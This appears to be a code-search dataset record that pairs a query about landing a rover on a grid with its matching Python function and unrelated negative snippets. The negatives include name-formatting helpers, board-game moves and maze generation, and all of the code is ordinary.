\"_\"\n\n string += baseName\n\n if len(suffix) > 0:\n string += \"_\" + suffix\n\n self.previewName.setText(string)", "def add(variable, value):\n prefixes[variable] = value", "def get_rep_name(self, name):\n return \"r{0}\".format(name)", "def expr_ext(self, rule_name, method):\n expr = Expression([Prefix([Suffix([Name([rule_name])])])])\n if method == \"prepend\":\n self.children.insert(0, expr)\n elif method == \"append\":\n self.children.append(expr)\n else: assert False, \"Method of extension not supported: '{0}'\".format(method)", "def add_key(self, prefix, suffix):\n if prefix in self:\n self[prefix].append(suffix)\n else:\n self[prefix] = [suffix]", "def name(prefix = 'tmp'):\n nameidx = context.curr().setdefault('NAME_INDEX', {})\n idx = nameidx.setdefault(prefix, 0)\n name = '_%s_%d' % (prefix, idx)\n nameidx[prefix] = idx + 1\n return name", "def add(self, name):\n\n # no need to add first_name while adding full_name\n name_list = name.strip().split()[1:]\n name_list.append(name)\n for item in set(name_list):\n node = self.root\n # check for every char in word, i.e. check whether is it in trie\n # if yes, then move forward over that path\n # else, add node with given char\n for char in item.lower():\n if char not in node:\n node[char] = {}\n node = node[char]\n\n if \"NAME\" in node:\n node[\"NAME\"].append(name)\n else:\n node[\"NAME\"] = [name]", "def start_name(self, attributes):\n self.name = True", "def _generate_new_prefix(current_prefix, class_name):\n return (\n \"_\".join((current_prefix, class_name)).upper()\n if current_prefix\n else class_name.upper()\n )", "def uniquify_name(self):\n self.name = f'{self.get_name()}_{len(self.store.get_user_functions())}'", "def set_postfix_arg(self, name, value):\n self._postfix_kwargs[name] = value", "def make_new_path(path, postfix = \"\", ext = \"\"):\n dir = os.path.split(path)[0]\n old_basename, old_ext = os.path.splitext(path)\n new_basename = old_basename + \"_\" + postfix\n new_path = os.path.join(dir, new_basename + \".\" + ext)\n return new_path", "def name(self, new_name: str) -> None:\n raise NotImplementedError()", "def create_extended_name(y: str, p: str) -> str:\n final_letter = y[-1]\n if final_letter == \"e\":\n extended_name = y + \"x\" + p\n elif final_letter in [\"a\", \"i\", \"o\", \"u\"]:\n extended_name = y[:-1] + \"ex\" + p\n elif final_letter == \"x\":\n if y[-2] == \"e\":\n extended_name = y + p\n else:\n extended_name = y + \"ex\" + p\n return extended_name", "def create_new_name(self, file_name):\n new_name = file_name\n index = 0\n while new_name in self.used_names:\n new_name = file_name + \"-\" + str(index)\n index += 1\n return new_name", "def name(self, name):\n pass", "def write_name(self, name):\n attr = self.get_attr(Name)\n attr.write(name)", "def set_name(self, newname=\"\"):\n self.name = newname", "def _build_name(name_id):\n return \"xp_%08d\" % name_id", "def _implicitNameOp(self, prefix, name):\n suffix = 'FAST' if self._optimized() else 'NAME'\n self.emit('%s_%s' % (prefix, suffix), name)", "def addName(self, dict, name, value):\n dict[name] = value", "def printname(bruce):", "def replace(self, name, *args):\n\n self._add(True, self.authority, name, *args)", "def generate_rename_direct(self, prefix):\n return \"#define %s%s %s\" % (prefix, self.__name, self.__rename)", "def smart_add(\n name = None,\n due_date = None,\n priority = None,\n tags = None,\n repeat = None,\n estimated = None,\n):\n\n smart = [re.sub(r'(^| )([@^!#*=])', r'\\1\\\\\\2', name)]\n\n if due_date:\n smart.append('^' + due_date)\n\n if priority:\n smart.append('!' + str(priority))\n\n if tags:\n smart.extend(['#' + t for t in tags])\n\n if repeat:\n smart.append('*' + repeat)\n\n if estimated:\n smart.append('=' + estimated)\n\n return ' '.join(smart)", "def visit_name(self, node, children):\n name = ''.join(children)\n return name", "def fullname(self, name):\n\n first, last = name.split(' ')\n self.first = first\n self.last = last", "def increment_name(name: str) -> str:\n\n match = _number_suffix.search(name)\n if match:\n number_str = match.group(1)\n next_number = int(number_str) + 1\n return f'{name[:-len(number_str)]}{next_number}'\n else:\n return f'{name}-1'", "def create_name(name, epochs, lr, lr_decay_step, dilation, batch_size):\n\treturn '{}_ep-{}_lr-{}_de-{}_di-{}_bs-{}'.format(name, epochs, lr, lr_decay_step, sum(dilation), batch_size)", "def add_suffix_to_filename(filename, suffix):\n name, ext = os.path.splitext(filename)\n return ''.join([name, suffix, ext])", "def octopus_names(self, msg, args):\r\n self.names.send_names(msg, args)", "def name_expand(name):\n\n m = re.search('G(\\d\\d\\d\\.\\d|\\d\\d\\.\\d|\\d\\.\\d)([+-])(\\d\\d\\.\\d|\\d\\.\\d)',\n name)\n\n lon = m.group(1)\n sig = m.group(2)\n lat = m.group(3)\n\n new_lon = (5-len(lon))*'0'+lon\n new_lat = (4-len(lat))*'0'+lat\n\n new_name = 'G'+new_lon+sig+new_lat\n\n return new_name", "def _uniquify_name(self, name, callable):\n while True:\n try:\n callable(name)\n name += u'_'\n except:\n break\n return name", "def append_to_filename(filepath: str, name_suffix: str, new_ext: Optional[str] = None) -> str:\n ext = new_ext or filepath_ext(filepath)\n name = filepath_name_only(filepath)\n return str(pathlib.Path(filepath).with_name(name+name_suffix).with_suffix(ext))", "def create_dns_name ( base_name, name ) :\n return create_r53_name( base_name, name) + '.mse-esp.com'", "def update_name(self, new_name):\r\n self.__name = new_name", "def update_name(self, new_name):\r\n self.__name = new_name", "def name(self, value):\n self._name = c(value)", "def get_name(self):\n return '.'.join(self.name)", "def addNamed( self, chunk ):\n self.chunkSeq.append( chunk )\n chunk.web= weakref.ref(self)\n nm= self.addDefName( chunk.name )\n if nm:\n # We found the full name for this chunk\n self.sequence += 1\n chunk.seq= self.sequence\n chunk.fullName= nm\n self.named[nm].append( chunk )\n chunk.initial= len(self.named[nm]) == 1\n self.logger.debug( \"Extending chunk {!r} from {!r}\".format(nm, chunk.name) )\n else:\n raise Error(\"No full name for {!r}\".format(chunk.name), chunk)", "def construct_name(p, prefix):\n name = prefix\n for key in p.keys():\n if (type(p[key]) != tuple) and (type(p[key]) != list):\n name = name + '_' + str(key) + '-' + str(p[key])\n else:\n name = name + '_' + str(key) + '-' + str(p[key][0])\n return name", "def makepaddedname(match):\n\n prefix = match.string[:match.start()]\n suffix = match.string[match.end():]\n padding = \"%%0%dd\" % (match.end() - match.start())\n template = prefix + padding + suffix\n return match.expand(template)", "def feed(self, entry):\r\n if entry.name not in self.names:\r\n self.names[entry.name] = list()\r\n self.names[entry.name].append(entry)", "def get_new_name(attrs: Dict[str, str],\n mark_name: str = '',\n name_map: Optional[Dict[str, str]] = None) -> str:\n if 'name' in attrs:\n new_name = attrs['name']\n else:\n new_name = '_'.join((attrs['func'], attrs['type'], str(attrs['id'])))\n\n if name_map is not None:\n if new_name in name_map:\n return name_map[new_name]\n\n if f'{mark_name}:{new_name}' in name_map:\n return name_map[f'{mark_name}:{new_name}']\n\n return new_name", "def add_names(self, *sNames):\n self.names += list(sNames)", "def print_name(name):\n print(\"Hello \"+ str(name))", "def AddName(self, name):\n self.__names.append(name)\n self.Modified()", "def group_add_name(org_id, data):\n if data.has_key('groupname'):\n groupname = data['groupname']\n add_group(org_id, groupname, False)", "def pack_name(name, prefix_length=0):\n name = str(name)\n if len(name) > 63 - prefix_length:\n hash = base64.b64encode(hashlib.md5(name.encode()).digest()).decode(\n ).rstrip('=')\n name = name[:prefix_length] + hash + ':' + name[-(\n 63 - prefix_length - 1 - len(hash)):]\n return name", "def get_name():", "def add(self, name):\n self.update(name)\n\n with open(os.path.join(self.attemptdir(name), 'new'), 'w+') as f:\n pass", "def series_add_prefix(series, prefix):\n f = partial(\"{prefix}{}\".format, prefix=prefix)\n\n return series.rename(index=f)", "def prefix(self, prefix, *args):\n new_prefix = '%s%s' % (self.prefixes[-1], prefix % args)\n self.prefixes.append(new_prefix)\n try:\n yield\n finally:\n assert self.prefixes.pop() == new_prefix", "def enter_name(self, name):\n self.name = name", "def _name_increment_revision(name):\n revre = r\"^(.*?)([0-9]+)$\"\n m = re.search(revre, name)\n if m:\n name = m.group(1) + str(int(m.group(2)) + 1)\n else:\n name = name + \" (copy)\"\n return name", "def createkey(*args): # {{{2\n return '-'.join(map(simplifyname, args))", "def namestr(self, sep: str = \", \", with_prefix: bool = True) -> str:\n names: list = [\n \"POSITIONAL\"\n if name == POSITIONAL\n else self._prefix_name(name)\n if with_prefix\n else name\n for name in sorted(self.names, key=len)\n ]\n return sep.join(names)", "def success_new_brass(name):\n return 'Nom de brasserie %s' % name + ' a bien ete ajoute'", "def AddStringPrefixOrSuffixToSelected(rig, insert_text, is_suffix):\n\n hierarchy_mod = rig.get_hierarchy_modifier()\n selection = hierarchy_mod.get_selection()\n\n if not selection:\n\n return\n\n for item in selection:\n\n src_name = str(item.get_editor_property(\"name\"))\n\n new_name = \"{0}_{1}\".format(insert_text, src_name)\n\n if is_suffix:\n \n new_name = \"{0}_{1}\".format(src_name, insert_text)\n\n hierarchy_mod.rename_element(item, new_name)", "def _transformed_name(key: Text) -> Text:\n return key + \"_xf\"", "def on_path(self, new):\n self.name = basename(new)", "def visit_Name(self, node):\n if isinstance(node.ctx, gast.Param) and node.id != \"self\":\n node.id += '_new'\n\n return node", "def generate_name(path_list):\n name = path_list[0]\n for item in path_list[1:]:\n name += \"[\" + item + \"]\"\n return name", "def increment_filename(self, filename, path=\"\", insert=\"\"):\n path = path.strip(\"/\")\n basename, ext = os.path.splitext(filename)\n for i in itertools.count():\n if i:\n insert_i = \"{}{}\".format(insert, i)\n else:\n insert_i = \"\"\n name = \"{basename}{insert}{ext}\".format(\n basename=basename, insert=insert_i, ext=ext\n )\n if not self.exists(\"{}/{}\".format(path, name)):\n break\n return name", "def prepend_to(self, key, entry):\n try:\n tail = os.path.pathsep + self[key]\n except KeyError:\n tail = \"\"\n self[key] = entry + tail" ]
[ "0.6697877", "0.662184", "0.6614897", "0.6473923", "0.6254014", "0.6248267", "0.6226696", "0.6212746", "0.62123245", "0.60669625", "0.6044965", "0.6044965", "0.6044435", "0.60033596", "0.5903342", "0.5898558", "0.588601", "0.5874177", "0.5855147", "0.58351374", "0.5803622", "0.5779463", "0.57719445", "0.57650536", "0.5749083", "0.57302135", "0.57257324", "0.57250845", "0.5724131", "0.5718624", "0.5712759", "0.5706087", "0.57048386", "0.5701772", "0.569791", "0.5694129", "0.5643821", "0.5643318", "0.56427133", "0.56324565", "0.5629263", "0.56179166", "0.5604659", "0.5600315", "0.5597865", "0.5591785", "0.55641514", "0.5562165", "0.5559544", "0.5554915", "0.5550336", "0.5549979", "0.5539963", "0.55377525", "0.55374813", "0.55327666", "0.5529383", "0.5523319", "0.5517398", "0.55140334", "0.55047923", "0.5504496", "0.549815", "0.549603", "0.5479796", "0.546021", "0.5453427", "0.5452819", "0.5446834", "0.54446125", "0.5438981", "0.5438981", "0.5436991", "0.5436929", "0.54369044", "0.542865", "0.5426084", "0.54140276", "0.54072374", "0.5397477", "0.5392492", "0.5387937", "0.5387488", "0.5386454", "0.53832465", "0.5374284", "0.5373094", "0.536267", "0.5362483", "0.53576404", "0.5356834", "0.53546906", "0.53490096", "0.53380126", "0.5337672", "0.53357655", "0.5334321", "0.5330996", "0.5330672", "0.53150934" ]
0.8279311
0
Lands the rover, and makes it part of the grid Throws an exception if A rover with that name already existed The rover being landed has a bad direction The rovers coordinates are off the grid A rover already exists on the gird at the rover's coordinates
def land_rover(self, rover): if self.rovers.get(rover.name): raise RoverException(ExceptionMessages.ROVER_ALREADY_LANDED) if not Rover.valid_direction(rover.direction): raise RoverException(ExceptionMessages.BAD_DIRECTION) if not self._is_coordinate_in_the_grid(rover.coordinate): raise RoverException(ExceptionMessages.OFF_GRID) if self._is_coordinate_occupied(rover.coordinate): raise RoverException(ExceptionMessages.ROVER_COLLISION) self.rovers[rover.name] = rover
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def make_move(self):\n self.owner = self.game.current_turn\n self.status = 'X' if self.owner == self.game.creator else 'O'\n ####\n #Random turn??\n ####\n self.save(update_fields=['status', 'owner'])\n\n # Add log entry for move\n self.game.add_log(f'cell made at ({self.row}, {self.col}) by {self.owner}')\n\n # Set the current turn for the other player if game is not over\n # Check if find winner\n if self.game.check_win(cell=self) or\\\n self.game.get_all_game_cells().filter(status='EMPTY').count() == 0:\n print(\"Winnnnnnnn\")\n self.game.mark_complete(winner=self.owner)\n\n # Switch player turn\n self.game.switch_turn()\n\n # Let the game know about the move and result\n self.send_game_update()", "def move_of_king_and_rook(self, from_row, from_col, to_row, to_col): \n #provjere da li su kraljevi ili topovi inicirali pomijeranje\n if(from_row == 7 and from_col == 0):\n self.wrl_moved = True\n elif(from_row == 7 and from_col == 7):\n self.wrr_moved = True\n elif(from_row == 7 and from_col == 4):\n self.wk_moved = True\n elif(from_row == 0 and from_col == 0):\n self.brl_moved = True\n elif(from_row == 0 and from_col == 7):\n self.brr_moved = True\n elif(from_row == 0 and from_col == 4):\n self.bk_moved = True\n \n #provjera da li je neko pojeo topove\n if(to_row == 7 and to_col == 0):\n self.wrl_moved = True\n elif(to_row == 7 and to_col == 7):\n self.wrr_moved = True\n elif(to_row == 0 and to_col == 0):\n self.brl_moved = True\n elif(to_row == 0 and to_col == 7):\n self.brr_moved = True", "def make_move(self, playername, coordinates, direction):\n\n pass", "def place_pillar_e(self):\r\n x = random.randint(0, (self.__nx - 1))\r\n y = random.randint(0, (self.__ny - 1))\r\n self.__pillar_e = x, y\r\n if self.pillar_e_room() == self.pillar_a_room() or \\\r\n self.pillar_e_room() == self.pillar_i_room() or \\\r\n self.pillar_e_room() == self.pillar_p_room() or \\\r\n self.pillar_e_room() == self.entrance_room() or \\\r\n self.pillar_e_room() == self.exit_room():\r\n return self.place_pillar_e()\r\n self.__maze[x][y].set_pillar_e(True)", "def place_road(self, road):\n\n # Check if space is empty\n if not self.environment.grid.is_cell_empty(road.pos):\n return False\n\n # Place Road\n self.environment.grid.place_agent(agent=road, pos=road.pos)\n\n # Add road to environment's road list\n self.environment.agents['roads'].append(road)\n\n # Update the list of cells where other things can be built\n self.update_available_cells(road)", "def process_rover(grid, start_at, instructions, name='rover'):\n plateu = None\n try:\n if isinstance(grid, str):\n x_end, y_end = grid.split(' ')\n x_end = int(x_end)\n y_end = int(y_end)\n plateu = Plateu(x_end, y_end, name)\n\n elif isinstance(grid, Plateu):\n plateu = grid\n\n else:\n raise ValueError(\"'grid' must be of type str or Plateu.\")\n\n except Exception as e:\n # Error handling code here for plateu here.\n print(e.message)\n return e # Should be re-raises and handled by API, CLI, etc.\n\n try:\n x, y, f = start_at.split(' ')\n x = int(x)\n y = int(y)\n rover = Rover(x, y, f, plateu, name)\n for i in range(len(instructions)):\n rover.position_rover(instructions[i])\n # Leaving this in comments for later debugging.\n # print(instructions[i] +\n # repr(rover.position_rover(instructions[i])))\n\n except Exception as e:\n # Error handling code here for rover here.\n print(e.message)\n return e # Should be re-raises and handled by API, CLI, etc.\n\n print(rover.get_position())\n return rover", "def path(self):\n\n path_direction = random.randrange(1, 6)\n # print(path_direction)\n\n # if current room is on the edge of the level (column 0 or column 4 and we did not drop to that room\n # because of hitting an edge in the previous assignment, assign the current room to be of type 2 and the\n # new room above it to be of type 3 so that the rooms connect\n if self.current_room_y in (0, 4) and self.edge_row_jump is False:\n self.room_type[self.current_room_x][self.current_room_y] = 3\n self.current_room_x += 1\n # if we are at the bottom of level and attempt to go down again, we will have found our start room. In this\n # we save the parameter and exit the loop\n if self.current_room_x > 4:\n self.room_type[self.current_room_x - 1][self.current_room_y] = 4\n self.start_room['row'] = self.current_room_x - 1\n self.start_room['column'] = self.current_room_y\n return True\n self.room_type[self.current_room_x][self.current_room_y] = 2\n # this is set to true so that we don't continue jumping up the side of the level\n self.edge_row_jump = True\n self.number_of_rooms += 1\n\n # if random number is 1 or 2 we move the path left and give that new room left/right exits\n elif path_direction in (1, 2):\n\n # if we are on the left edge of level then we shouldn't move left any further\n # if cell we are moving to has already been assigned then we should not move there either\n if self.current_room_y > 0 and self.room_type[self.current_room_x][self.current_room_y - 1] is 0:\n # we now have a new direction without jumping rows because of hitting an edge\n self.edge_row_jump = False\n # move current room to the left\n self.current_room_y -= 1\n # assign that room with a left/right exit\n self.room_type[self.current_room_x][self.current_room_y] = 1\n self.number_of_rooms += 1\n\n # if random number is 3 or 4 we move right and give that new room left/right exits\n elif path_direction in (3, 4):\n # check if the room we are moving to has already been assigned or is off the screen\n if self.current_room_y < 4 and self.room_type[self.current_room_x][self.current_room_y + 1] == 0:\n # we now have a new direction without jumping rows because of hitting an edge\n self.edge_row_jump = False\n # move current room to the right\n self.current_room_y += 1\n # assign that room with a left/right exit\n self.room_type[self.current_room_x][self.current_room_y] = 1\n self.number_of_rooms += 1\n\n # if random number is 5 then we are moving down\n elif self.number_of_rooms != 0 and path_direction is 5:\n self.edge_row_jump = False\n self.room_type[self.current_room_x][self.current_room_y] = 3\n # print cell to screen\n self.current_room_x += 1\n # if we are at bottom of level and attempt to go down again, we will have found our start room. In this\n # we save the parameter and exit the loop\n if self.current_room_x > 4:\n self.room_type[self.current_room_x - 1][self.current_room_y] = 4\n self.start_room['row'] = self.current_room_x - 1\n self.start_room['column'] = self.current_room_y\n return True\n self.room_type[self.current_room_x][self.current_room_y] = 2\n self.number_of_rooms += 1\n\n # print array to see if movements are correct\n # for row in self.room_type:\n # print(row)\n return False", "def test_human_cannot_move_through_grid_wall(mock_random):\n mock_random.randint.return_value = 0\n human = Human()\n\n coordinates = [0, 0]\n dimensions = [4, 4]\n\n new_coordinates = human.move(coordinates, dimensions)\n assert new_coordinates == [0, 0]", "def place_entrance(self):\r\n x = random.randint(0, (self.__nx - 1))\r\n y = random.randint(0, (self.__ny - 1))\r\n self.__current_room = x, y # places adventurer in dungeon at start of game\r\n self.__entrance_room = x, y\r\n self.__maze[x][y].set_entrance(True)", "def test_rover_position(self):\n rover = Rover(self.plateau_dimensions, self.rover_initial_position, Rover.DIRECTIONS.get('E'))\n rover.execute_instructions(\"LMLM\")\n self.assertEqual(rover._position.x, 1)\n self.assertEqual(rover._position.y, 2)\n self.assertEqual(rover.get_heading, 'W')", "def make_move(self): \n if self.counter == 0:\n #AI makes a random move to start\n ai_move = random.randrange(0,((self.size[0] * self.size[1]) - 1)) \n \n #Number to coordinate conversion\n row = ai_move % self.size[0]\n column = ai_move % self.size[0]\n self.start_game((row, column))\n self.counter = 1\n\n if (self.board[(row, column)] == 'm'):\n #print() \"\\n\", \"First move RIP!, what are the odds...\"\n self.found_mine()\n self.gameover = 1\n \n else:\n row, column = self.find_move()\n \n #0.25 second wait \n #time.sleep(0.25)\n\n #Prints out to the terminal the move and type of move\n print(row, \",\", column)\n\n #Updates the GUI\n root.update()\n \n if (self.board[(row, column)] == 'm'):\n print(\"RIP!\") \n self.found_mine() \n self.gameover = 1\n \n elif self.board[(row, column)] == '0':\n print(\"No mines in sight\") \n self.found_space((row, column))\n\n elif self.board[(row, column)] == '1':\n print(\"There is 1 mine next to this spot\") \n self.found_border((row, column))\n else:\n print(\"There are\", self.board[(row, column)], \"mines next to this spot\") \n self.found_border((row, column))", "def roof(self, x, y, z, width=10, length=10, height=10, details=None, name=\"wall\", mergeshape=None, makeroof=True, makeceiling=True):\r\n global wallnum\r\n\r\n roof = SolidObject(name+str(wallnum), Size(length, 1, width), Position(x, y+height+self.ceilingthickness / 2, z), 0)\r\n self.walls.append(roof)\r\n roofmodel = Plane(w=length, h=width, name=name+str(wallnum))\r\n mergeshape.add(roofmodel,x,y+height+self.ceilingthickness,z,rx=90.0,ry=0.0,rz=0.0)\r\n\r\n wallnum += 1", "def __init__(self, _filename):\n # -- open text file containing maze\n self.file = open(_filename, 'r')\n self._grid = []\n # -- initialize line_list and append into list\n line_list = []\n lines = self.file.readlines()\n for line in lines:\n line = line.strip('\\n')\n line_list = [char for char in line]\n self._grid.append(line_list)\n # -- placing the player at the very start\n self._player = Player(1,2)\n self._grid[self._player._x][self._player._y] = POINT_OF_PLAYER\n self._grid[3][-1] = POINT_OF_EXIT\n \n \n\n # --- Rename the check method to can_move_to\n \"\"\" \n :return: return False if the location is a wall, otherwise return True\n :rtype: bool\n \"\"\"", "def create_neighborhood(self):\n if len(self.available_building_cells) == 0:\n return False\n # Pick cell\n shuffle(self.available_building_cells)\n\n neighborhood_origin = self.available_building_cells[0]\n if not self.creates_valid_building(neighborhood_origin):\n # If not a valid placement, remove location from list\n self.available_building_cells.remove(neighborhood_origin)\n # Retry!\n self.create_neighborhood()\n return True # Exit after neighborhood is created\n\n final_cells = [neighborhood_origin]\n self.available_building_cells.remove(neighborhood_origin)\n\n # Place building on origin\n self.place_building(Building(self.environment, self.environment.next_building_id, neighborhood_origin, attractiveness=random()))\n neighborhood_cells = self.environment.grid.get_neighborhood(neighborhood_origin, moore=True, include_center=True)\n\n # Create a random number of residence buildings in this neighborhood\n number_of_residences = randrange(2,6)\n for i in range(number_of_residences):\n while len(neighborhood_cells) > 0:\n shuffle(neighborhood_cells)\n # Only place building if space is empty\n if self.environment.grid.is_cell_empty(neighborhood_cells[0]):\n self.place_building(Building(self.environment, self.environment.next_building_id, neighborhood_cells[0], attractiveness=random()))\n final_cells.append(neighborhood_cells[0])\n try:\n # If this space was available before, remove it from list\n self.available_building_cells.remove(neighborhood_cells[0])\n except:\n pass\n\n continue\n\n # Remove cell from list\n neighborhood_cells.remove(neighborhood_cells[0])\n\n # Fill surrounding space around buildings with roads!\n for building_location in final_cells:\n for surrounding_cell in self.environment.grid.get_neighborhood(building_location, moore=True):\n if self.environment.grid.is_cell_empty(surrounding_cell):\n self.place_road(Road(surrounding_cell))\n\n return True", "def make_move(self):\n\n # get relavent information\n affinity = self.get_affinity()\n sample_space = self.get_game_space()\n depth_limit = self.__search_depth\n\n # run a minimax search and get the best value\n bestval = MinimaxTree.minimax(self, sample_space, affinity, depth_limit, True)\n if bestval[0] is None: bestval = ((0,6),'x', 0)\n\n # print the number of nodes expanded \n print(self.nodes_expanded)\n\n # make the move found by the search \n self.get_game_space().set_tile(bestval[0][0], bestval[0][1], affinity)", "def make_swivelknife_move(self):\n offset = self.shape.parentLayer.getToolRadius()\n drag_angle = self.shape.drag_angle\n\n startnorm = offset*Point(1, 0) # TODO make knife direction a config setting\n prvend, prvnorm = Point(), Point()\n first = True\n\n for geo in self.shape.geos.abs_iter():\n if isinstance(geo, LineGeo):\n geo_b = deepcopy(geo)\n if first:\n first = False\n prvend = geo_b.Ps + startnorm\n prvnorm = startnorm\n norm = offset * (geo_b.Pe - geo_b.Ps).unit_vector()\n geo_b.Ps += norm\n geo_b.Pe += norm\n if not prvnorm == norm:\n direction = prvnorm.to3D().cross_product(norm.to3D()).z\n swivel = ArcGeo(Ps=prvend, Pe=geo_b.Ps, r=offset, direction=direction)\n swivel.drag = drag_angle < abs(swivel.ext)\n self.append(swivel)\n self.append(geo_b)\n\n prvend = geo_b.Pe\n prvnorm = norm\n elif isinstance(geo, ArcGeo):\n geo_b = deepcopy(geo)\n if first:\n first = False\n prvend = geo_b.Ps + startnorm\n prvnorm = startnorm\n if geo_b.ext > 0.0:\n norma = offset*Point(cos(geo_b.s_ang+pi/2), sin(geo_b.s_ang+pi/2))\n norme = Point(cos(geo_b.e_ang+pi/2), sin(geo_b.e_ang+pi/2))\n else:\n norma = offset*Point(cos(geo_b.s_ang-pi/2), sin(geo_b.s_ang-pi/2))\n norme = Point(cos(geo_b.e_ang-pi/2), sin(geo_b.e_ang-pi/2))\n geo_b.Ps += norma\n if norme.x > 0:\n geo_b.Pe = Point(geo_b.Pe.x+offset/(sqrt(1+(norme.y/norme.x)**2)),\n geo_b.Pe.y+(offset*norme.y/norme.x)/(sqrt(1+(norme.y/norme.x)**2)))\n elif norme.x == 0:\n geo_b.Pe = Point(geo_b.Pe.x,\n geo_b.Pe.y)\n else:\n geo_b.Pe = Point(geo_b.Pe.x-offset/(sqrt(1+(norme.y/norme.x)**2)),\n geo_b.Pe.y-(offset*norme.y/norme.x)/(sqrt(1+(norme.y/norme.x)**2)))\n if prvnorm != norma:\n direction = prvnorm.to3D().cross_product(norma.to3D()).z\n swivel = ArcGeo(Ps=prvend, Pe=geo_b.Ps, r=offset, direction=direction)\n swivel.drag = drag_angle < abs(swivel.ext)\n self.append(swivel)\n prvend = geo_b.Pe\n prvnorm = offset*norme\n if -pi < geo_b.ext < pi:\n self.append(ArcGeo(Ps=geo_b.Ps, Pe=geo_b.Pe, r=sqrt(geo_b.r**2+offset**2), direction=geo_b.ext))\n else:\n geo_b = ArcGeo(Ps=geo_b.Ps, Pe=geo_b.Pe, r=sqrt(geo_b.r**2+offset**2), direction=-geo_b.ext)\n geo_b.ext = -geo_b.ext\n self.append(geo_b)\n # TODO support different geos, or disable them in the GUI\n # else:\n # self.append(copy(geo))\n if not prvnorm == startnorm:\n direction = prvnorm.to3D().cross_product(startnorm.to3D()).z\n self.append(ArcGeo(Ps=prvend, Pe=prvend-prvnorm+startnorm, r=offset, direction=direction))\n\n self.geos.insert(0, RapidPos(self.geos.abs_el(0).Ps))\n self.geos[0].make_abs_geo()", "async def land(self, msg, distance):\n\t\tself.tile[self.p] += distance\n\t\tif self.tile[self.p] >= 40: #past go\n\t\t\tself.tile[self.p] -= 40\n\t\t\tdoDoubleGo = await self.cog.config.guild(self.ctx.guild).doDoubleGo()\n\t\t\tgoValue = await self.cog.config.guild(self.ctx.guild).goValue()\n\t\t\tif self.tile[self.p] == 0 and doDoubleGo:\n\t\t\t\tadd = goValue * 2\n\t\t\telse:\n\t\t\t\tadd = goValue\n\t\t\tself.bal[self.p] += add\n\t\t\tmsg += (\n\t\t\t\tf'You {\"landed on\" if self.tile[self.p] == 0 else \"passed\"} go, +${add}! '\n\t\t\t\tf'You now have ${self.bal[self.p]}.\\n'\n\t\t\t)\n\t\tmsg += f'You landed at {TILENAME[self.tile[self.p]]}.\\n'\n\t\tif self.ownedby[self.tile[self.p]] == self.p: #player is owner\n\t\t\tmsg += 'You own this property already.\\n'\n\t\telif self.ismortgaged[self.tile[self.p]] == 1: #mortgaged\n\t\t\tmsg += 'It is currently mortgaged. No rent is due.\\n'\n\t\telif self.ownedby[self.tile[self.p]] == -2: #unownable\n\t\t\tif self.tile[self.p] == 0: #go\n\t\t\t\tpass #already handled when moving\n\t\t\telif self.tile[self.p] == 10: #jail\n\t\t\t\tmsg += 'Just visiting!\\n'\n\t\t\telif self.tile[self.p] == 20: #free parking\n\t\t\t\tfreeParkingValue = await self.cog.config.guild(self.ctx.guild).freeParkingValue()\n\t\t\t\tif freeParkingValue is None: #no reward\n\t\t\t\t\tpass\n\t\t\t\telif freeParkingValue == 'tax': #tax reward\n\t\t\t\t\tself.bal[self.p] += self.freeparkingsum\n\t\t\t\t\tmsg += (\n\t\t\t\t\t\tf'You earned ${self.freeparkingsum}. You now have ${self.bal[self.p]}.\\n'\n\t\t\t\t\t)\n\t\t\t\t\tself.freeparkingsum = 0\n\t\t\t\telse: #hard coded reward\n\t\t\t\t\tself.bal[self.p] += freeParkingValue\n\t\t\t\t\tmsg += f'You earned ${freeParkingValue}. You now have ${self.bal[self.p]}.\\n'\n\t\t\telif self.tile[self.p] == 30: #go to jail\n\t\t\t\tself.injail[self.p] = True\n\t\t\t\tself.tile[self.p] = 10\n\t\t\t\tself.was_doubles = False\n\t\t\t\tmsg += 'You are now in jail!\\n'\n\t\t\telif self.tile[self.p] in (2, 17, 33): #cc\n\t\t\t\tcard = self.ccorder[self.ccn]\n\t\t\t\tmsg += f'Your card reads:\\n{CCNAME[card]}\\n'\n\t\t\t\tif card == 0:\n\t\t\t\t\tself.tile[self.p] = 0\n\t\t\t\t\tdoDoubleGo = await self.cog.config.guild(self.ctx.guild).doDoubleGo()\n\t\t\t\t\tgoValue = await self.cog.config.guild(self.ctx.guild).goValue()\n\t\t\t\t\tif doDoubleGo:\n\t\t\t\t\t\tself.bal[self.p] += goValue * 2\n\t\t\t\t\telse:\n\t\t\t\t\t\tself.bal[self.p] += goValue\n\t\t\t\t\tmsg += f'You now have ${self.bal[self.p]}.\\n'\n\t\t\t\telif card == 1:\n\t\t\t\t\tself.bal[self.p] += 200\n\t\t\t\t\tmsg += f'You now have ${self.bal[self.p]}.\\n'\n\t\t\t\telif card == 2:\n\t\t\t\t\tself.bal[self.p] -= 50\n\t\t\t\t\tself.freeparkingsum += 50\n\t\t\t\t\tmsg += f'You now have ${self.bal[self.p]}.\\n'\n\t\t\t\telif card == 3:\n\t\t\t\t\tself.bal[self.p] += 50\n\t\t\t\t\tmsg += f'You now have ${self.bal[self.p]}.\\n'\n\t\t\t\telif card == 4:\n\t\t\t\t\tself.goojf[self.p] += 1\n\t\t\t\t\tif self.goojf[self.p] == 1:\n\t\t\t\t\t\tmsg += 'You now have 1 get out of jail free card.\\n'\n\t\t\t\t\telse:\n\t\t\t\t\t\tmsg += f'You now have {self.goojf[self.p]} get out of jail free cards.\\n'\n\t\t\t\telif card == 5:\n\t\t\t\t\tself.tile[self.p] = 10\n\t\t\t\t\tself.injail[self.p] = True\n\t\t\t\t\tself.was_doubles = False\n\t\t\t\telif card == 6:\n\t\t\t\t\tself.bal[self.p] += 50 * (self.numalive - 1)\n\t\t\t\t\tmsg += f'You now have ${self.bal[self.p]}.\\n'\n\t\t\t\t\tfor i in range(self.num):\n\t\t\t\t\t\tif self.isalive[i] and not i == self.p:\n\t\t\t\t\t\t\tmem = await self.get_member(self.uid[i])\n\t\t\t\t\t\t\tself.bal[i] -= 50\n\t\t\t\t\t\t\tmsg += f'{mem.display_name} now has ${self.bal[i]}.\\n'\n\t\t\t\telif card in (7, 10, 16):\n\t\t\t\t\tself.bal[self.p] += 100\n\t\t\t\t\tmsg += f'You now have ${self.bal[self.p]}.\\n'\n\t\t\t\telif card == 8:\n\t\t\t\t\tself.bal[self.p] += 20\n\t\t\t\t\tmsg += f'You now have ${self.bal[self.p]}.\\n'\n\t\t\t\telif card in (9, 15):\n\t\t\t\t\tself.bal[self.p] += 10\n\t\t\t\t\tmsg += f'You now have 